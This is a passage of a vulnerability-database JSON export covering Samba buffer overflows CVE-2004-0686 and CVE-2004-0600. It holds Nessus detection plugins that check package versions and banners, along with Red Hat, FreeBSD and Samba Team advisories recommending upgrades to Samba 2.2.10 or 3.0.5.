script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:259\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"samba-3.0.4-6.3E\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"samba-client-3.0.4-6.3E\")) flag++;\n if 
(rpm_check(release:\"RHEL3\", reference:\"samba-common-3.0.4-6.3E\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"samba-swat-3.0.4-6.3E\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba / samba-client / samba-common / samba-swat\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:15", "description": "New samba packages are available for Slackware 8.1, 9.0, 9.1, 10.0\nand -current to fix security issues.", "edition": 23, "published": "2005-07-13T00:00:00", "title": "Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : new samba packages (SSA:2004-207-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "modified": "2005-07-13T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:8.1", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:samba"], "id": "SLACKWARE_SSA_2004-207-01.NASL", "href": "https://www.tenable.com/plugins/nessus/18774", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2004-207-01. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18774);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_xref(name:\"SSA\", value:\"2004-207-01\");\n\n script_name(english:\"Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : new samba packages (SSA:2004-207-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New samba packages are available for Slackware 8.1, 9.0, 9.1, 10.0\nand -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.407946\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8156733a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/25\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"samba\", pkgver:\"2.2.10\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"samba\", pkgver:\"2.2.10\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"samba\", pkgver:\"2.2.10\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"samba\", pkgver:\"3.0.5\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"samba\", pkgver:\"3.0.5\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:05:19", "description": "Updated samba packages that fix a buffer overflow issue are 
now\navailable.\n\nSamba provides file and printer sharing services to SMB/CIFS clients.\n\nThe Samba team discovered a buffer overflow in the code used to\nsupport the 'mangling method = hash' smb.conf option. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0686 to this issue.\n\nAll users of Samba should upgrade to these updated packages, which\ncontain an upgrade to Samba-2.2.10, which is not vulnerable to this\nissue.", "edition": 28, "published": "2004-07-26T00:00:00", "title": "RHEL 2.1 : samba (RHSA-2004:404)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686"], "modified": "2004-07-26T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:samba", "p-cpe:/a:redhat:enterprise_linux:samba-common", "p-cpe:/a:redhat:enterprise_linux:samba-client", "p-cpe:/a:redhat:enterprise_linux:samba-swat"], "id": "REDHAT-RHSA-2004-404.NASL", "href": "https://www.tenable.com/plugins/nessus/13846", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:404. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13846);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0686\");\n script_xref(name:\"RHSA\", value:\"2004:404\");\n\n script_name(english:\"RHEL 2.1 : samba (RHSA-2004:404)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix a buffer overflow issue are now\navailable.\n\nSamba provides file and printer sharing services to SMB/CIFS clients.\n\nThe Samba team discovered a buffer overflow in the code used to\nsupport the 'mangling method = hash' smb.conf option. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0686 to this issue.\n\nAll users of Samba should upgrade to these updated packages, which\ncontain an upgrade to Samba-2.2.10, which is not vulnerable to this\nissue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:404\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:404\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"samba-2.2.10-1.21as.1\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"samba-client-2.2.10-1.21as.1\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"samba-common-2.2.10-1.21as.1\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"samba-swat-2.2.10-1.21as.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba / samba-client / samba-common / samba-swat\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-01T06:01:31", "description": "The remote Samba server, according to its version number, is vulnerable \nto a buffer overflow if the option 'mangling method' is set to 'hash' 
\nin smb.conf (which is not the case by default).\n\nAn attacker may exploit this flaw to execute arbitrary commands on the \nremote host.", "edition": 25, "published": "2004-07-22T00:00:00", "title": "Samba Mangling Method Hash Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:samba:samba"], "id": "SAMBA_MANGLING_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/13657", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13657);\n script_version (\"1.16\");\n\n script_cve_id(\"CVE-2004-0686\");\n script_bugtraq_id(10781);\n\n script_name(english:\"Samba Mangling Method Hash Overflow\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"It might be possible to run arbitrary code on the remote server.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote Samba server, according to its version number, is vulnerable \nto a buffer overflow if the option 'mangling method' is set to 'hash' \nin smb.conf (which is not the case by default).\n\nAn attacker may exploit this flaw to execute arbitrary commands on the \nremote host.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.samba.org/samba/history/samba-2.2.10.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.samba.org/samba/history/samba-3.0.5.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Samba 2.2.10 or 3.0.5\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/22\");\n 
script_set_attribute(attribute:\"vuln_publication_date\", value: \"2004/07/22\");\n script_cvs_date(\"Date: 2018/07/24 17:29:25\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\nscript_end_attributes();\n\n script_summary(english:\"checks samba version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gain a shell remotely\");\n script_dependencie(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\nif ( get_kb_item(\"CVE-2004-0686\") ) exit(0);\n\nlanman = get_kb_item(\"SMB/NativeLanManager\");\nif(\"Samba\" >< lanman)\n{\n if(ereg(pattern:\"Samba 2\\.2\\.[0-9]$\", string:lanman))\n security_warning(139);\n else if(ereg(pattern:\"Samba 3\\.0\\.[0-4]$\", string:lanman))\n security_warning(139);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-01T06:01:15", "description": "According to its banner, the version of Samba running on the remote\nhost is between 3.0.2 and 3.0.4, inclusive. 
An error exists in the\nbase64 decoding functions, which can result in a buffer overflow.", "edition": 26, "published": "2011-11-18T00:00:00", "title": "Samba SWAT 3.0.2 - 3.0.4 HTTP Basic Auth base64 Buffer Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0600"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:samba:samba"], "id": "SAMBA_3_0_5.NASL", "href": "https://www.tenable.com/plugins/nessus/17720", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17720);\n script_version (\"1.9\");\n script_cvs_date(\"Date: 2018/11/15 20:50:23\");\n\n script_cve_id(\"CVE-2004-0600\");\n script_bugtraq_id(10780);\n script_xref(name:\"EDB-ID\", value:\"364\");\n\n script_name(english:\"Samba SWAT 3.0.2 - 3.0.4 HTTP Basic Auth base64 Buffer Overflow\");\n script_summary(english:\"Checks version of Samba.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Samba server is affected by a buffer overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Samba running on the remote\nhost is between 3.0.2 and 3.0.4, inclusive. 
An error exists in the\nbase64 decoding functions, which can result in a buffer overflow.\");\n\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.samba.org/samba/history/samba-3.0.5.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2004-0600.html\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nativelanman.nasl\", \"swat_detect.nasl\");\n script_require_keys(\"SMB/NativeLanManager\", \"SMB/samba\", \"Settings/ParanoidReport\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2)\n exit(1, \"This plugin only runs if 'Report Paranoia' is set to 'Paranoid'.\");\n\nif (!get_kb_item(\"Settings/PCI_DSS\"))\n{\n ports = get_kb_list(\"SWAT/*\");\n if (isnull(ports) || max_index(ports) == 0)\n exit(0, \"SWAT does not appear to be listening on the remote host.\");\n}\n\nport = get_kb_item_or_exit(\"SMB/transport\");\nlanman = get_kb_item_or_exit(\"SMB/NativeLanManager\");\n\n# Ensure 
the remote server is running Samba 3.0.x.\nif (\"Samba \" >!< lanman)\n exit(0, \"The SMB service listening on port \"+port+\" is not running Samba.\");\n\n# Split and convert third version number to integer.\nversion = lanman - \"Samba \";\nver = split(version, sep:\".\", keep:FALSE);\nver[2] = int(ver[2]);\n\nif (ver[0] == 3 && ver[1] == 0 && (ver[2] >= 2 && ver[2] <= 4))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : 3.0.5' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse exit(0, \"The Samba \"+version+\" install listening on port \"+port+\" is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:35:14", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "\nEvgeny Demidov discovered that the Samba server has a\n\t buffer overflow in the Samba Web Administration Tool (SWAT)\n\t on decoding Base64 data during HTTP Basic Authentication.\n\t Versions 3.0.2 through 3.0.4 are affected.\nAnother buffer overflow bug has been found in the code\n\t used to support the \"mangling method = hash\" smb.conf\n\t option. The default setting for this parameter is \"mangling\n\t method = hash2\" and therefore not vulnerable. Versions\n\t between 2.2.0 through 2.2.9 and 3.0.0 through 3.0.4 are affected.\n", "edition": 4, "modified": "2008-09-26T00:00:00", "published": "2004-07-14T00:00:00", "id": "2DE14F7A-DAD9-11D8-B59A-00061BC2AD93", "href": "https://vuxml.freebsd.org/freebsd/2de14f7a-dad9-11d8-b59a-00061bc2ad93.html", "title": "Multiple Potential Buffer Overruns in Samba", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:47", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0600", "CVE-2004-0686"], "description": "Samba provides file and printer sharing services to SMB/CIFS clients. 
\n \nEvgeny Demidov discovered a flaw in the internal routine used by the Samba\nWeb Administration Tool (SWAT) in Samba versions 3.0.2 through 3.0.4. When\ndecoding base-64 data during HTTP basic authentication, an invalid base-64\ncharacter could cause a buffer overflow. If the SWAT administration\nservice is enabled, this flaw could allow an attacker to execute arbitrary\ncode. The Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2004-0600 to this issue.\n\nAdditionally, the Samba team discovered a buffer overflow in the code used\nto support the 'mangling method = hash' smb.conf option. Please be aware\nthat the default setting for this parameter is 'mangling method = hash2'\nand therefore not vulnerable. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CAN-2004-0686 to this issue.\n\nThis release includes the updated upstream version 3.0.4 together with \nbackported security patches to correct these issues as well as a number of\npost-3.0.4 bug fixes from the Samba subversion repository. \n \nThe most important bug fix allows Samba users to change their passwords \nif Microsoft patch KB 828741 (a critical update) had been applied. \n \nAll users of Samba should upgrade to these updated packages, which\nresolve these issues.", "modified": "2017-07-29T20:27:24", "published": "2004-07-22T04:00:00", "id": "RHSA-2004:259", "href": "https://access.redhat.com/errata/RHSA-2004:259", "type": "redhat", "title": "(RHSA-2004:259) samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:53", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0686"], "description": "Samba provides file and printer sharing services to SMB/CIFS clients. \n \nThe Samba team discovered a buffer overflow in the code used to support \nthe 'mangling method = hash' smb.conf option. 
The Common Vulnerabilities \nand Exposures project (cve.mitre.org) has assigned the name CAN-2004-0686 \nto this issue. \n \nAll users of Samba should upgrade to these updated packages, which \ncontain an upgrade to Samba-2.2.10, which is not vulnerable to this \nissue.", "modified": "2018-03-14T19:27:03", "published": "2004-07-26T04:00:00", "id": "RHSA-2004:404", "href": "https://access.redhat.com/errata/RHSA-2004:404", "type": "redhat", "title": "(RHSA-2004:404) samba security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSummary: Potential Buffer Overruns in Samba 3.0 and Samba 2.2\r\nCVE ID: CAN-2004-0600, CAN-2004-0686\r\n~ (http://cve.mitre.org/)\r\n\r\n- -------------\r\nCAN-2004-0600\r\n- -------------\r\n\r\nAffected Versions: >= v3.0.2\r\n\r\nThe internal routine used by the Samba Web Administration\r\nTool (SWAT v3.0.2 and later) to decode the base64 data\r\nduring HTTP basic authentication is subject to a buffer\r\noverrun caused by an invalid base64 character. It is\r\nrecommended that all Samba v3.0.2 or later installations\r\nrunning SWAT either (a) upgrade to v3.0.5, or (b) disable\r\nthe swat administration service as a temporary workaround.\r\n\r\nThis same code is used internally to decode the\r\nsambaMungedDial attribute value when using the ldapsam\r\npassdb backend. 
While we do not believe that the base64\r\ndecoding routines used by the ldapsam passdb backend can\r\nbe exploited, sites using an LDAP directory service with\r\nSamba are strongly encouraged to verify that the DIT only\r\nallows write access to sambaSamAccount attributes by a\r\nsufficiently authorized user.\r\n\r\nThe Samba Team would like to heartily thank Evgeny Demidov\r\nfor analyzing and reporting this bug.\r\n\r\n\r\n- -------------\r\nCAN-2004-0686\r\n- -------------\r\n\r\nAffected Versions: >= v2.2.9, >= v3.0.0\r\n\r\n\r\nA buffer overrun has been located in the code used to support\r\nthe 'mangling method = hash' smb.conf option. Please be aware\r\nthat the default setting for this parameter in Samba 3 is\r\n'mangling method = hash2' and therefore not vulnerable.\r\n\r\nAffected Samba installations can avoid this possible security\r\nbug by using the hash2 mangling method. Server installations\r\nrequiring the hash mangling method are encouraged to upgrade\r\nto Samba 3.0.5 (or 2.2.10).\r\n\r\n~ --------------------------------------\r\n\r\n\r\nSamba 3.0.5 and 2.2.10 are identical to the previous release\r\nin each respective series with the exception of fixing these\r\nissues. Samba 3.0.5rc1 has been removed from the download area\r\non Samba.org and 3.0.6rc2 will be available later this week.\r\n\r\n\r\nThe source code can be downloaded from :\r\n\r\n~ http://download.samba.org/samba/ftp/\r\n\r\nThe uncompressed tarball and patch file have been signed\r\nusing GnuPG. 
The Samba public key is available at\r\n\r\n~ http://download.samba.org/samba/ftp/samba-pubkey.asc\r\n\r\nBinary packages are available at\r\n\r\n~ http://download.samba.org/samba/ftp/Binary_Packages/\r\n\r\nThe release notes are also available on-line at\r\n\r\n~ http://www.samba.org/samba/whatsnew/samba-3.0.5.html\r\n~ http://www.samba.org/samba/whatsnew/samba-2.2.10.html\r\n\r\nOur code, Our bugs, Our responsibility.\r\n(Samba Bugzilla -- https://bugzilla.samba.org/)\r\n\r\n\r\n~ -- The Samba Team\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.4 (GNU/Linux)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niD8DBQFA/6GdIR7qMdg1EfYRAhGYAJ9wsFUb4+1Nu3shPQn12O5tXQAe1ACgvs6a\r\nHxsnDPYXoL+q5UoYb6/2iJA=\r\n=YCOV\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2004-07-23T00:00:00", "published": "2004-07-23T00:00:00", "id": "SECURITYVULNS:DOC:6530", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6530", "title": "Security Release - Samba 3.0.5 and 2.2.10", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nHP SECURITY BULLETIN\r\n\r\n\r\nHPSBUX01062 REVISION: 0\r\n\r\nSSRT4782 rev. 
